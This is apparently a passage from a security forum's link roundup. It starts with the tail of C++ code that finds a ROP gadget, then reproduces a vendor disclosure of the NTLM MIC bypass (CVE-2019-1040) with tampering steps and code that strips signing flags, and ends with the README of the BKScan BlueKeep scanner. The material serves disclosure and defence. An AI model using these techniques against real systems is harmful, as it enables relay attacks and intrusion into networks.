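    for (SIZE_T i = 0; i + patLen <= size; i++) {
        if (memcmp(base + i, pattern, patLen) == 0)
            return base + i;
    }
    return NULL;
}

int main()
{
    const BYTE popRet[] = { 0x5D, 0xC3 };  // pop ebp ; ret

    // For the sketch we scan our own image; the size comes from the PE header.
    const BYTE* base = (const BYTE*)GetModuleHandle(NULL);
    const IMAGE_DOS_HEADER* dos = (const IMAGE_DOS_HEADER*)base;
    const IMAGE_NT_HEADERS* nt  = (const IMAGE_NT_HEADERS*)(base + dos->e_lfanew);

    const BYTE* gadget = FindGadget(base, nt->OptionalHeader.SizeOfImage,
                                    popRet, sizeof(popRet));
    printf("gadget at: %p (image base %p)\n", gadget, base);
    return 0;
}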
  24. Drop the MIC - CVE-2019-1040

Posted by Marina Simakov on Jun 11, 2019 9:52:17 AM

As announced in our recent security advisory, Preempt researchers discovered how to bypass the MIC (Message Integrity Code) protection on NTLM authentication and modify any field in the NTLM message flow, including the signing requirement. This bypass allows attackers to relay authentication attempts which have negotiated signing to another server while entirely removing the signing requirement. All servers which do not enforce signing are vulnerable.

Background

NTLM relay is one of the most prevalent attacks on Active Directory environments. The most significant mitigation against this attack technique is server signing. However, by default only domain controllers enforce SMB signing, which in many cases leaves other sensitive servers vulnerable. To compromise such a server, attackers would need to capture an NTLM negotiation which does not negotiate signing. This is the case for HTTP, but not for SMB, where by default the session is necessarily signed if both parties support signing. To ensure that the NTLM negotiation stage is not tampered with by attackers, Microsoft added an additional field to the final NTLM authentication message - the MIC. However, we discovered that until Microsoft's latest security patch, this field was useless, which enabled the most desired relay scenario of all - SMB to SMB relay.

Session Signing

When users authenticate to a target via NTLM, they may be vulnerable to relay attacks. In order to protect servers from such attacks, Microsoft has introduced various mitigations, the most significant of which is session signing. When users establish a signed session against a server, attackers cannot hijack the session because they are unable to retrieve the required session key.

In SMB, session signing is negotiated by setting the 'NTLMSSP_NEGOTIATE_SIGN' flag in the NTLM_NEGOTIATE message. The client behavior is determined by several group policies ('Microsoft network client: Digitally sign communications'), whose default configuration is to set the flag in question. If attackers attempt to relay such an NTLM authentication, they need to ensure that signing is not negotiated. One way to do so is to relay to protocols in which the NTLM messages don't govern the session integrity, such as LDAPS or HTTPS. However, these protocols are not open on every machine, as opposed to SMB, which is enabled by default on all Windows machines and, in many cases, allows remote code execution. Consequently, the holy grail of NTLM relay attacks lies in relaying SMB authentication requests to other SMB servers.

In order to successfully perform such an NTLM relay, the attackers need to modify the NTLM_NEGOTIATE message and unset the 'NTLMSSP_NEGOTIATE_SIGN' flag. However, in newer NTLM versions there is a protection against such modifications - the MIC field.

Figure 1 - The NTLM_NEGOTIATE message dictates whether to negotiate SMB signing

MIC Overview

An NTLM authentication consists of 3 message types: NTLM_NEGOTIATE, NTLM_CHALLENGE and NTLM_AUTHENTICATE. To ensure that the messages are not manipulated in transit by a malicious actor, an additional MIC (Message Integrity Code) field has been added to the NTLM_AUTHENTICATE message. The MIC is an HMAC_MD5 applied to the concatenation of all 3 NTLM messages, keyed with the session key, which is known only to the account initiating the authentication and the target server.
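To make that construction concrete, here is a minimal sketch of the MIC computation described above. It is only an illustration, not code from the advisory; it assumes the three raw NTLM messages and the 16-byte session key are already in hand, and it uses OpenSSL for the HMAC-MD5.

#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <cstdint>
#include <vector>

// Sketch: MIC = HMAC-MD5(session_key, NTLM_NEGOTIATE || NTLM_CHALLENGE || NTLM_AUTHENTICATE).
// Per MS-NLMP, the 16-byte MIC field inside NTLM_AUTHENTICATE is zeroed while
// the HMAC is calculated (assumed to already be done by the caller here).
std::vector<uint8_t> ComputeMic(const uint8_t session_key[16],
                                const std::vector<uint8_t>& negotiate,
                                const std::vector<uint8_t>& challenge,
                                const std::vector<uint8_t>& authenticate)
{
    // Concatenate the three raw NTLM messages in order.
    std::vector<uint8_t> blob;
    blob.insert(blob.end(), negotiate.begin(), negotiate.end());
    blob.insert(blob.end(), challenge.begin(), challenge.end());
    blob.insert(blob.end(), authenticate.begin(), authenticate.end());

    // HMAC-MD5 keyed with the session key; the 16-byte result is the MIC
    // placed in the NTLM_AUTHENTICATE message.
    std::vector<uint8_t> mic(16);
    unsigned int mic_len = 0;
    HMAC(EVP_md5(), session_key, 16, blob.data(), blob.size(),
         mic.data(), &mic_len);
    return mic;
}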
Hence, an attacker who tries to tamper with one of the messages (for example, to modify the signing negotiation) is unable to generate a corresponding MIC, which causes the attack to fail.

Figure 2 - The 'MIC' field protects NTLM messages from modification

The presence of the MIC is announced in the 'msvAvFlag' field of the NTLM_AUTHENTICATE message (flag 0x2 indicates that the message includes a MIC), and it should fully protect servers from attackers who attempt to remove the MIC and perform NTLM relay. However, we found out that Microsoft servers do not take advantage of this protection mechanism and accept unsigned (MIC-less) NTLM_AUTHENTICATE messages.

Figure 3 - The 'flags' field indicating that the NTLM_AUTHENTICATE message includes a MIC

Drop The MIC

We discovered that all NTLM authentication requests are susceptible to relay attacks, no matter which protocol carries them. If the negotiation request includes a signing requirement, attackers need to perform the following steps to overcome the protection of the MIC (a rough sketch of the first step appears further below):

1. Unset the signing flags in the NTLM_NEGOTIATE message (NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMSSP_NEGOTIATE_SIGN).
2. Remove the MIC from the NTLM_AUTHENTICATE message.
3. Remove the version field from the NTLM_AUTHENTICATE message (removing the MIC field without removing the version field would result in an error).
4. Unset the following flags in the NTLM_AUTHENTICATE message: NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMSSP_NEGOTIATE_SIGN, NEGOTIATE_KEY_EXCHANGE, NEGOTIATE_VERSION.

We believe that this is a serious attack vector which breaks the misconception that the MIC protects an NTLM authentication in any way. The root cause is that a target server which accepts an authentication whose 'msvAvFlag' value indicates that it carries a MIC does not in fact verify the presence of this field. This leaves all servers which do not enforce server signing (in most organizations, the vast majority of servers, since by default only domain controllers enforce SMB signing) vulnerable to NTLM relay attacks.

This attack not only allows attackers to overcome the session signing negotiation, but also leaves the organization vulnerable to much more complicated relay attacks which manipulate the NTLM messages in transit to overcome various security settings such as EPA (Extended Protection for Authentication). For more details on this attack, refer to the following blog.

In order to truly protect your servers from NTLM relay attacks, enforce signing on all your servers. If such a configuration is too strict for your environment, try to configure this setting on as many of your sensitive servers as possible. Microsoft has released the following fix: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1040

How Preempt can Help

Preempt constantly works to protect its customers. Customers who have deployed Preempt have been consistently protected from NTLM relay attacks. The Preempt Platform provides full network NTLM visibility, allowing you to reduce NTLM traffic and analyze suspicious NTLM activity. In addition, Preempt has innovative, industry-first deterministic NTLM relay detection capabilities, can inspect all GPO configurations, and will alert on insecure configurations. For non-Preempt customers, this configuration inspection is also available in Preempt Lite, a free lightweight version of the Preempt Platform.
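As referenced in the step list above, here is a minimal sketch of step 1 only: clearing the signing flags in a raw NTLM_NEGOTIATE message. It is an illustration rather than tooling from the advisory; it assumes a little-endian host, uses the flag values from MS-NLMP, and leaves out the more involved NTLM_AUTHENTICATE changes (stripping the MIC and Version fields and fixing up the payload offsets).

#include <cstdint>
#include <cstring>
#include <vector>

// Negotiate flag values from MS-NLMP.
constexpr uint32_t NTLMSSP_NEGOTIATE_SIGN        = 0x00000010;
constexpr uint32_t NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000;

// In NTLM_NEGOTIATE, the NegotiateFlags field is a little-endian DWORD at
// offset 12, right after the 8-byte "NTLMSSP\0" signature and the
// 4-byte MessageType.
void DropSigningFlags(std::vector<uint8_t>& negotiate_msg)
{
    if (negotiate_msg.size() < 16)
        return; // too short to be a valid NTLM_NEGOTIATE message

    uint32_t flags;
    std::memcpy(&flags, &negotiate_msg[12], sizeof(flags));
    flags &= ~(NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN);
    std::memcpy(&negotiate_msg[12], &flags, sizeof(flags));
}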
You can download Preempt Lite here and verify which areas of your network are vulnerable.

Sursa: https://blog.preempt.com/drop-the-mic
  25. BKScan

BKScan is a BlueKeep (CVE-2019-0708) scanner that works both unauthenticated and authenticated (i.e. when Network Level Authentication (NLA) is enabled).

Requirements:

- A Windows RDP server
- If NLA is enabled on the RDP server, a valid user/password that is part of the "Remote Desktop Users" group

It is based on FreeRDP and uses Docker to ease compilation/execution. It should work on any UNIX environment and has been tested mainly on Linux/Ubuntu.

Usage

Building

Install prerequisites:

sudo apt-get install docker.io

Build the custom FreeRDP client inside the Docker container named bkscan:

$ git clone https://github.com/nccgroup/BKScan.git
$ cd BKScan
$ sudo docker build -t bkscan .
[...]
Successfully built f7666aeb3259
Successfully tagged bkscan:latest

Running

Invoke the bkscan.sh script from your machine. It will invoke the custom FreeRDP client inside the newly created bkscan Docker container:

$ sudo ./bkscan.sh -h
Usage: ./bkscan.sh -t <target_ip> [-P <target_port>] [-u <user>] [-p <password>] [--debug]

Target with NLA enabled and valid credentials

Against a vulnerable Windows 7 with NLA enabled and valid credentials:

$ sudo ./bkscan.sh -t 192.168.119.141 -u user -p password
[+] Targeting 192.168.119.141:3389...
[+] Using provided credentials, will support NLA
[-] Max sends reached, please wait to be sure...
[!] Target is VULNERABLE!!!

Against a Windows 10 (non-vulnerable) or a patched Windows 7 with NLA enabled and valid credentials:

$ sudo ./bkscan.sh -t 192.168.119.133 -u user -p password
[+] Targeting 192.168.119.133:3389...
[+] Using provided credentials, will support NLA
[-] Max sends reached, please wait to be sure...
[*] Target appears patched.

Target with NLA enabled and non-valid credentials

Against a Windows 7 (vulnerable or patched) with NLA enabled, scanned with a client that does not support NLA:

$ sudo ./bkscan.sh -t 192.168.119.141
[+] Targeting 192.168.119.141:3389...
[+] No credential provided, won't support NLA
[-] Connection reset by peer, NLA likely to be enabled. Detection failed.

Against a Windows 7 (vulnerable or patched) with NLA enabled and valid credentials, but where the user is not part of the "Remote Desktop Users" group:

$ sudo ./bkscan.sh -t 192.168.119.141 -u test -p password
[+] Targeting 192.168.119.141:3389...
[+] Using provided credentials, will support NLA
[-] NLA enabled, credentials are valid but user has insufficient privileges. Detection failed.

Against a Windows 7 (vulnerable or patched) with NLA enabled and non-valid credentials:

$ sudo ./bkscan.sh -t 192.168.119.141 -u user -p badpassword
[+] Targeting 192.168.119.141:3389...
[+] Using provided credentials, will support NLA
[-] NLA enabled and access denied. Detection failed.

Against a Windows 10 (non-vulnerable) with NLA enabled and non-valid credentials:

$ sudo ./bkscan.sh -t 192.168.119.133 -u user -p badpassword
[+] Targeting 192.168.119.133:3389...
[+] Using provided credentials, will support NLA
[-] NLA enabled and logon failure. Detection failed.

Note: the difference in output between Windows 7 and Windows 10 is likely due to the Windows CredSSP versions, and your output may differ.

Target with NLA disabled

Against a vulnerable Windows XP (no NLA support):

$ sudo ./bkscan.sh -t 192.168.119.137
[+] Targeting 192.168.119.137:3389...
[+] No credential provided, won't support NLA
[-] Max sends reached, please wait to be sure...
[!] Target is VULNERABLE!!!
Target with RDP disabled

Against a Windows 7 with RDP disabled or a blocked port:

$ sudo ./bkscan.sh -t 192.168.119.142
[+] Targeting 192.168.119.142:3389...
[+] No credential provided, won't support NLA
[-] Can't connect properly, check IP address and port.

Thanks

Special thanks to @JaGoTu and @zerosum0x0 for releasing their Unauthenticated CVE-2019-0708 "BlueKeep" Scanner, see here. The BKScan scanner in this repo works similarly to their scanner but has been ported to FreeRDP to support NLA.

Thank you to mi2428 for releasing a script to run FreeRDP in Docker, see here.

Also thank you to the following people for contributing: nikallass

Problems?

If you have a problem with the BlueKeep scanner, please create an issue on this GitHub repository with the detailed output of ./bkscan.sh --debug.

Known issues

Failed to open display

Some recent versions of Linux (e.g. Ubuntu 18.04 or Kali 2019.2 Rolling) do not play well with the $DISPLAY and $XAUTHORITY environment variables.

$ sudo ./bkscan.sh -t 192.168.119.137
[+] Targeting 192.168.119.137:3389...
[+] No credential provided, won't support NLA
[07:58:35:866] [1:1] [ERROR][com.freerdp.client.x11] - failed to open display: :0
[07:58:35:866] [1:1] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

It works fine on a fresh installation of Ubuntu 18.04 but not on an installation I have used for a while, so I am blaming some updated X11-related package or configuration. docker-org documents this and proposes a solution, but I haven't been able to get it working myself, so I am not sure they are describing the same issue. If you have this issue initially and are able to fix it, please feel free to do a PR.

Contact

@saidelike

Sursa: https://github.com/nccgroup/BKScan